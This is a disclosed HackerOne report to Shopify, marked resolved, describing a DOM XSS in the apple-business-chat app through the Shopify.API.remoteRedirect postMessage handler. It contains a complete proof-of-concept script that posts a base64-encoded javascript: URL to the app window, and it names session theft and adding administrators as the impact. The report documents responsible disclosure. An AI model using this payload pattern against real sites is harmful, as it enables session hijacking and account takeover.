██████ DOM XSS via Shopify.API.remoteRedirect

Disclosed: 2019-09-15 07:14:27 By yxw21 To shopify
Low
Vulnerability Details
Hi, team. I found a dom xss on the apple-business-chat app that seems to be referring to a vulnerable js file. For users who have installed this app, just let him use the theme code I provided to complete xss. Modify the theme code to the following payload ``` <script> function attack(){ let ctx=window.open('https://apple-business-chat-commerce.shopifycloud.com'),interval; let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.domain)`); interval=setInterval(()=>{ ctx && ctx.postMessage({ "message":"Shopify.API.remoteRedirect", "data":{ "location":`javascript:eval(atob('${payload}'))` } },location.origin); },500); window.onmessage=(e)=>{ e.data==="success"&&( console.log('attack success'), window.onmessage=null, clearInterval(interval) ); }; } attack(); </script> <a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a> ``` As shown below {F531015} Then click on the store front page to trigger {F531016} *█████* ## Impact Steal session information, add administrators, etc.
Actions
View on HackerOne
Report Stats
  • Report ID: 646505
  • State: Closed
  • Substate: resolved
  • Upvotes: 76
Share this report